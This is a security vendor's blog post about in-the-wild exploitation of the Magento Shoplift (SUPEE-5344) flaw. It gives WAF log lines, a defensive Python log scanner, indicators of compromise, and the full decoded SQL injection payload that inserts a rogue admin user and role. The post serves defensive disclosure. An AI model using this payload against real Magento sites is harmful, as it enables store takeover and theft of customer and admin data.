Magento Shoplift (SUPEE-5344) Exploits in the Wild

As warned a few days ago, the Magento Shoplift (SUPEE-5344) vulnerability details have been disclosed by the CheckPoint team. They show step by step how it can be exploited to take over a vulnerable Magento site.

They have prepared the following video showing a Proof of Concept (PoC) in which they create a fake coupon:

That’s a simple example. This vulnerability can be exploited in much more devastating ways.

Magento ShopLift in the Wild

As expected, it is now actively being exploited.

In less than 24 hours since the disclosure, we have started to see attacks via our WAF logs trying to exploit this vulnerability. It seems to be coming from a specific crime group, since they all look the same:

62.76.177.179 - - [23/Apr/2015:00:45:44 -0400] "POST /index.php/admin/Cms_Wysiwyg/[HIDDEN] HTTP/1.1" 403 1880 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36"

185.22.232.218 - - [22/Apr/2015:00:42:38 -0400] "POST /index.php/admin/Cms_Wysiwyg/[HIDDEN] HTTP/1.1" 200 2211 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"

And always from these two IP addresses from Russia: 62.76.177.179 and 185.22.232.218. If you look for them in your logs, you can see if you have been attacked by the same group.
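As an added example that is not part of the original post, here is a small Python log scanner for the pattern described above: POST requests to the Cms_Wysiwyg endpoint, whether each one was blocked (403) or actually reached Magento, and whether the source is one of the two addresses named here. The sample log lines are constructed (the hidden path suffix is left as [HIDDEN], as in the post, and 203.0.113.7 and 198.51.100.4 are documentation placeholder addresses, not real attackers).

```python
import re
from collections import Counter

# Indicators from the post: the two source IPs and the endpoint the requests target.
SHOPLIFT_IPS = {"62.76.177.179", "185.22.232.218"}
SHOPLIFT_PATH = re.compile(r"/index\.php/admin/Cms_Wysiwyg/", re.IGNORECASE)

# Combined log format: ip ident user [time] "method path proto" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample: the post's two requests (suffix kept hidden, as in the post),
# one benign admin page view, and one attempt from a third, made-up address.
SAMPLE_LOG = [
    '62.76.177.179 - - [23/Apr/2015:00:45:44 -0400] "POST /index.php/admin/Cms_Wysiwyg/[HIDDEN] HTTP/1.1" 403 1880 "-" "Mozilla/5.0"',
    '185.22.232.218 - - [22/Apr/2015:00:42:38 -0400] "POST /index.php/admin/Cms_Wysiwyg/[HIDDEN] HTTP/1.1" 200 2211 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Apr/2015:09:10:11 -0400] "GET /index.php/admin/dashboard/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [23/Apr/2015:11:12:13 -0400] "POST /index.php/admin/Cms_Wysiwyg/[HIDDEN] HTTP/1.1" 200 2211 "-" "curl/7.38"',
]

def parse_line(line):
    """Return the fields of one combined-format access log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Verdict for one parsed request: 'blocked', 'reached_app', or None if unrelated."""
    if entry is None or entry["method"] != "POST" or not SHOPLIFT_PATH.search(entry["path"]):
        return None
    # 403 means the WAF or a server rule stopped it; any other status means Magento
    # processed the request, so admin_user and admin_role need to be audited.
    return "blocked" if entry["status"] == "403" else "reached_app"

def scan(lines):
    """Count Shoplift attempts per verdict and per source IP, and note known-group hits."""
    verdicts, sources, known_group = Counter(), Counter(), set()
    for line in lines:
        entry = parse_line(line)
        verdict = classify(entry)
        if verdict is None:
            continue
        verdicts[verdict] += 1
        sources[entry["ip"]] += 1
        if entry["ip"] in SHOPLIFT_IPS:
            known_group.add(entry["ip"])
    return {"verdicts": dict(verdicts), "sources": dict(sources),
            "known_group": sorted(known_group)}
```

Any "reached_app" hit means the request was not stopped before Magento, so the admin_user table should be checked for accounts you did not create, regardless of whether the source IP matches the two above.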

Our research team was able to catch and analyze their exploit. So far, it only tries to create a fake admin user inside the Magento database, which they will certainly use later to take over the site. This is the decoded exploit:

popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);

SET @SALT = "rp";

SET @PASS = CONCAT(MD5(CONCAT( @SALT , '123') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;

INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname',"email@example.com",'ypwq',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());

INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = 'ypwq'),'Firstname'); --

The code leverages SQL Injection (SQLi) to insert a new admin_user into the database. If you suspect you have been compromised, look for the usernames ypwq or defaultmanager, as those seem to be the ones used by this specific group so far.

Note that we are hiding some of the details and payloads, to make it hard for someone else to copy and create an exploit out of it. However, some groups already have an exploit and are attacking as many sites as they can, and pretty fast.

Protect your Magento site!

If you haven't patched it yet, you are likely already compromised or will be soon. I recommend patching and putting your site behind a Web Application Firewall or Intrusion Detection System to stop these attacks for you.

If you’re in need of a solution, don’t hesitate to inquire about our Website Firewall; this vulnerability has been virtually patched for all existing customers.
